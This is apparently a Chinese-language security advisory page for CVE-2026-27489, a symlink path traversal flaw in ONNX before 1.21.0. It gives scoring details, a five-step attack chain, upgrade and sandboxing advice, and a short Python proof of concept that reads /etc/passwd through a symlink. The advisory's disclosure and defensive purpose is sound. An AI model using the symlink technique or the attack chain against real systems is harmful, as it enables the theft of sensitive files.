CVE-2026-27489 CVSS 7.5 高危

CVE-2026-27489 ONNX路径遍历漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27489

漏洞类型

路径遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open Neural Network Exchange (ONNX)

漏洞概述

ONNX在1.21.0版本之前存在路径遍历漏洞。攻击者可利用符号链接读取模型或用户指定目录之外的任意文件。该漏洞无需认证即可通过网络远程利用，可能导致敏感信息泄露。

技术细节

该漏洞源于ONNX在处理模型文件时，未能正确验证符号链接（symlink）指向的目标路径。在受影响版本中，当加载模型时，程序会跟随符号链接读取文件，但未限制链接指向的路径范围，导致路径遍历攻击。攻击者可以构造一个恶意的ONNX模型文件，其中包含指向系统敏感文件（如/etc/passwd）的符号链接。当受害者加载并解析该模型时，ONNX库会解析符号链接并读取目标文件内容。根据CVSS向量分析，该攻击无需用户交互（UI:N）和权限（PR:N），且攻击复杂度低（AC:L）。成功利用后，攻击者可获得高机密性（C:H）的数据访问权限，但不会影响完整性和可用性。该问题已在版本1.21.0中通过限制路径解析范围得到修复。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在使用ONNX库处理模型文件，且版本低于1.21.0。

STEP 2

载荷制作

攻击者构造一个特殊的文件结构，其中包含指向系统敏感文件（如/etc/passwd或密钥文件）的符号链接，并将其打包为模型或相关数据文件。

STEP 3

投递载荷

攻击者通过网络将包含恶意符号链接的模型文件发送给目标系统，或诱导目标应用程序加载该文件。

STEP 4

漏洞利用

目标系统使用存在漏洞的ONNX库加载模型。库在解析文件时跟随符号链接，读取了路径之外的敏感文件内容。

STEP 5

数据泄露

敏感文件内容被加载到内存中，攻击者可能通过应用程序的响应或后续的数据传输获取这些信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import sys

# PoC for CVE-2026-27489: ONNX Path Traversal via Symlink
# This script demonstrates the concept of creating a symlink to a sensitive file
# that an attacker might trick a vulnerable ONNX loader into reading.

def create_malicious_symlink():
    target_file = "/etc/passwd"  # Target file to read
    malicious_link = "model_data.onnx"  # Name of the symlink

    print(f"[*] Creating symlink '{malicious_link}' pointing to '{target_file}'...")
    
    try:
        os.symlink(target_file, malicious_link)
        print("[+] Symlink created successfully.")
        
        # Simulate the vulnerable behavior: reading the file via the symlink
        if os.path.exists(malicious_link):
            with open(malicious_link, 'r') as f:
                content = f.read()
                print("[+] Content read via symlink (Vulnerable behavior):")
                print(content[:100] + "...")
        
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        # Cleanup
        if os.path.islink(malicious_link):
            os.remove(malicious_link)
            print("[*] Symlink removed.")

if __name__ == "__main__":
    create_malicious_symlink()

影响范围

Open Neural Network Exchange (ONNX) < 1.21.0

防御指南

临时缓解措施

建议立即将ONNX库升级到修复版本1.21.0。如果暂时无法升级，应在沙箱或受限环境中加载不可信的模型文件，并严格限制运行进程的文件系统读写权限，防止访问系统敏感目录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表